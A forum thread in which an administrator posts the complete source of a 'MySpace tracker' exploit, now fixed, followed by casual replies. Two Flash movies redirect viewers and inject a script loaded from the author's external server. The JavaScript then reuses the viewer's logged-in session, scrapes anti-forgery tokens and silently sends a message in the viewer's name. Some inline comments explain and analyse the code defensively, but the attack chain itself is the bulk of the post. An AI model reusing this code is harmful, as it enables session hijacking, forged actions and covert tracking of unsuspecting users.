The mySpace tracker source code.


VTECin5th

Administrator
I wanted to post this up to give an insight on what runs things like the (expired) myspace tracker.
This may be helpful to 0.1% of those who read it, or passer by'ers...I think Tom follows this thread.
:p

This required 2 flash movies and 1 javascript.
1 Flash movie forced the user to the blog page. (Because the hole existed in the blog page)
1 Flash movie pulled javascript into the page, because myspace 'forgot' to lock down the embedded flash movie with
allowScriptAccess="never" (which they have since added, and that's why it's fixed now)

Flash 1 (set cookie and force user to blog):
Code:
// Flash movie 1: after a short delay, send the viewer to a blog page, but only
// when the timestamp saved by a previous run is at least 30 seconds old.
// The timestamp lives in a Flash local shared object named "counter", which is
// kept by the Flash player and is not a browser cookie.
mySharedObject = SharedObject.getLocal("counter");
function doitnow(){
// Runs once: the interval created on the last line is cancelled on its first tick.
clearInterval(loads);
// myIdy0 is not defined in this listing; presumably the ID of the profile that
// embeds the movie -- TODO confirm.
var poo = myIdy0;
var tme = new Date();
// Current time in whole seconds. "secs" is declared twice; the second
// declaration only overwrites it with the floored value.
var secs = tme.getTime() / 1000;
var secs = Math.floor(secs);
var pood = secs;
// Timestamp saved by the previous run (no value yet on a first run).
_root.lol = mySharedObject.data.count;
if (pood - 30 >= _root.lol){
// Saved timestamp is 30 s old or more: record the new time and navigate the
// current window ("_self") to the blog page for that ID.
mySharedObject.data.count = secs;
mySharedObject.flush();
getURL("http://blog.myspace.com/" + poo, "_self");
}
else
{
// Ran less than 30 s ago: only refresh the timestamp, no navigation.
// Presumably this keeps a viewer who was just redirected from being bounced again.
mySharedObject.data.count = secs;
mySharedObject.flush();
} 
} 
// Fire doitnow() 1.2 seconds after the movie starts.
var loads = setInterval(doitnow, 1200);

Flash 2 (Call in javascript 'script src' from my server):
Code:
// Flash movie 2: getURL() is handed a script URL instead of a web address, so
// the browser evaluates it in the page that embeds the movie. The URL-encoded
// argument is a document.writeln() call that writes a <script src=...> tag
// pointing at the author's own server, so the host page loads remote script.
// The scheme is printed here as "java script:" (with a space), probably
// altered by the forum's output filter.
// Defence: this depends on the embed letting Flash call into the page; per the
// post, the site closed the hole by forcing allowScriptAccess="never" on
// embedded movies.
getURL("java script:document.writeln(%22%3CScript src%3Dhttp%3A%2F%2FnittoRevolution.net%2FmySpacez.js%3E%3C%2Fscript%3E%22)", "");

The reason I really liked this method was that, i controlled both parts of it, meaning i could make remote changes at any time to improve the script.

Now for the JS (makes the silent calls to send the message, then redirects back to the main profile page):

Code:
// Entry point of the injected script. Per the post it is loaded into a page on
// blog.myspace.com, so every request below is same-origin and is made in the
// viewer's logged-in session.
// http_request is shared with makeRequest()/doCon(); http_xml is never used in
// the code shown.
var http_request = false;
var http_xml = false;
// Take whatever follows the first "m/" in the escaped page URL (for
// http://blog.myspace.com/<id> that is the path after the host).
// If the URL contains no "m/", getID is undefined and the length test throws.
var this_url = escape(self.location);
var first_split = this_url.split('m/');
var getID = first_split[1];
if(getID.length > 12){
// Longer than 12 characters: treated as something other than a bare profile
// ID. Only re-render the current page through vtak()/norm(); no message is sent.
var thisl = self.location;
vtak(thisl);
}
else{
// Short path: treat it as the profile ID, start the message flow, and
// schedule the return to the profile page after 3 s.
// NOTE(review): setTimeout is given a string, which is evaluated as code.
start(getID);
setTimeout("destruct()",3000);
}
/**
 * Fetches `uid` (a URL; the caller passes the current page location) with an
 * asynchronous GET and hands the response to norm().
 * The request object is stored in the implicit global `makehis`.
 */
function vtak(uid) {
var showNormal = uid;
// Native XMLHttpRequest where available, else the legacy IE ActiveX object.
// If neither exists, `makehis` is never assigned and the next line throws.
if (window.XMLHttpRequest) {
makehis = new XMLHttpRequest();
}
else if (window.ActiveXObject){
makehis = new ActiveXObject("Microsoft.XMLHTTP");
}
makehis.onreadystatechange = norm;
makehis.open("GET",showNormal,true);
makehis.send(null);
}
/**
 * Completion handler for vtak(): on a finished (readyState 4) HTTP 200
 * response, removes the first ".swf" from the page text and writes the result
 * into the document.
 */
function norm(){
if (makehis.readyState == 4){
if (makehis.status == 200){
var getN = makehis.responseText;
// A string pattern replaces only the first occurrence. Per the author's note
// on omg(), the aim is to stop the Flash movie loading so it cannot forward
// the viewer away again.
var rep = getN.replace('.swf','');
document.write(rep);
}
}
}
/**
 * Builds the "compose message" URL (fuseaction=mail.message) for FinalID on
 * the blog host and requests it via makeRequest().
 * FinalID is appended without any encoding.
 */
function start(FinalID){
var omgz = "http://blog.myspace.com/index.cfm?fuseaction=mail.message&FriendID=" + FinalID;
makeRequest(omgz);
}
/**
 * Issues an asynchronous GET for `url` using the shared global `http_request`
 * and registers doCon() as the completion handler.
 */
function makeRequest(url) {
// Native XMLHttpRequest where available, else the legacy IE ActiveX object.
// If neither exists, http_request keeps its initial value `false` and the
// calls below throw.
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
}
else if (window.ActiveXObject){
http_request = new ActiveXObject("Microsoft.XMLHTTP");
}
http_request.onreadystatechange = doCon;
http_request.open("GET",url,true); 
http_request.send(null);
}
/**
 * Completion handler for makeRequest(): scrapes three form values out of the
 * compose-message page (hashcode, toUserID, Mytoken), builds the body of the
 * send-message POST from them and passes it to vcon().
 *
 * NOTE(defence): hashcode and Mytoken look like per-form anti-forgery values
 * -- TODO confirm. Because this script runs inside the site's own origin it
 * can read them straight out of the form HTML, so such tokens give no
 * protection once script injection is possible; the fix has to be at the
 * injection point (per the post, allowScriptAccess="never" on embedded Flash).
 */
function doCon(){
if (http_request.readyState == 4){
if (http_request.status == 200){
var getData = http_request.responseText;
// Everything below is plain string splitting, not HTML parsing. If any
// marker is missing from the page, an indexed value is undefined and the
// following .split() throws inside this callback.
// hash1[1] is the text between the first "hashcode" and the next one (or the
// end of the page); all three values are searched for in that same segment.
var hash1 = getData.split("hashcode");
var hash2 = hash1[1];
var getRest = hash1[1];
var getMore = getRest;
// getMore2 is never read.
var getMore2 = getMore;
// hashcode: text between the first value=" and the following ">.
var hash3 = hash2.split('value="');
var hash4 = hash3[1];
var hash5 = hash4.split('">');
var gotHash = hash5[0];
// toUserID: same pattern, starting after the "toUserID" marker.
var toID = getRest.split('toUserID');
var toID2 = toID[1];
var toID3 = toID2.split('value="');
var toID4 = toID3[1];
var toID5 = toID4.split('">');
var gotID = toID5[0];
// Mytoken: split on value= and > with no quote handling, so if the attribute
// is quoted the quotes stay in gotTok.
var toke = getMore.split('Mytoken');
var toke2 = toke[1];
var toke3 = toke2.split('value=');
var toke4 = toke3[1];
var toke5 = toke4.split('>');
var gotTok = toke5[0];
// urlMail and urlStr2 are implicit globals. The scraped values are
// concatenated into the form body without URL-encoding.
// NOTE(detection): subject "(Visitor)" and body "Just+Looking" are constants,
// so messages produced this way share a fixed signature that can be matched
// server-side.
urlMail = "http://blog.myspace.com/index.cfm?fuseaction=mail.sendmessage";
urlStr2 = "&hashcode=" + gotHash + "&messageType=0&toUserID=" + gotID + "&Mytoken=" + gotTok + "&errorReturnUrl=http%3A%2F%2Fmail.myspace.com%2Findex.cfm%3Ffuseaction%3Dmail.message%26friendID%3D" + gotID + "&returnUrl=http%3A%2F%2Fmail.myspace.com%2Findex.cfm%3Ffuseaction%3Dmail.messagesent%26friendID%3D" + gotID + "&subject=(Visitor)&mailbody=Just+Looking";
vcon(urlMail,urlStr2,gotID);
}
}
}
/**
 * POSTs the form body `pdt` to `prl` as application/x-www-form-urlencoded,
 * then immediately calls vtax(id).
 * No readystatechange handler is attached, so the outcome of the POST is
 * never checked. The request object is the implicit global `make_this`.
 */
function vcon(prl,pdt,id) {
// Native XMLHttpRequest where available, else the legacy IE ActiveX object.
if (window.XMLHttpRequest) {
make_this = new XMLHttpRequest();
}
else if (window.ActiveXObject){
make_this = new ActiveXObject("Microsoft.XMLHTTP");
}
make_this.open("POST",prl,true);
make_this.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); 
make_this.send(pdt);
// Does not wait for the POST to complete before starting the page re-fetch.
vtax(id);
}
/**
 * Re-fetches the blog page for `oid` with an asynchronous GET and registers
 * omg() as the completion handler. The request object is the implicit global
 * `makethis`.
 */
function vtax(oid) {
var OGL = "http://blog.mySpace.com/" + oid;
// Native XMLHttpRequest where available, else the legacy IE ActiveX object.
if (window.XMLHttpRequest) {
makethis = new XMLHttpRequest();
}
else if (window.ActiveXObject){
makethis = new ActiveXObject("Microsoft.XMLHTTP");
}
makethis.onreadystatechange = omg;
makethis.open("GET",OGL,true);
makethis.send(null);
}
/**
 * Completion handler for vtax(): on a finished HTTP 200 response, writes the
 * blog page into the document with the first ".swf" removed, then calls
 * destruct().
 */
function omg(){
// Author's note: this reads in the blog page and removes the Flash movie so
// that it does not forward the viewer away again, the same as norm().
if (makethis.readyState == 4){
if (makethis.status == 200){
var getz = makethis.responseText;
// `moo` is an implicit global; a string pattern replaces only the first match.
moo = getz.replace(".swf","");
document.write(moo);
destruct();
}
}
}
/**
 * Navigates the window to the main profile page for the global `getID`.
 * Called from omg() and also from the 3-second timer set by the top-level code.
 */
function destruct(){
location='http://www.myspace.com/' + getID;
}

There's a lot of things that can be built to run just like this all over the interweb.
PS Tom, yea I'll work for you for $100,000 a month. :p
 
do you think that your past run-ins with myspace caused it to be found, or do you think that somebody ran their mouth off? Do you really think tom follows the thread?
 
oh haha... i am watching this movie that i posted in the members lounge... i have been laughing for hours. Plus i decided to get some sechs tonight! so i am happy :)
 
Quoted post:
do you think that your past run-ins with myspace caused it to be found, or do you think that somebody ran their mouth off? Do you really think tom follows the thread?
I am almost SURE someone ran their mouth off...
Remember that there's 2 sides to this: The people who want to use it, and the people who DON'T want it used on them.
My previous run-ins probably didn't help much.
I doubt that Tom follows this thread, but someone among us is helping to pass the word :ph34r:

Quoted post:
http://sigs.biz/

what about this?
You click it, tell me if it works, after it doesn't I'll keep my plans to make another one later :p
 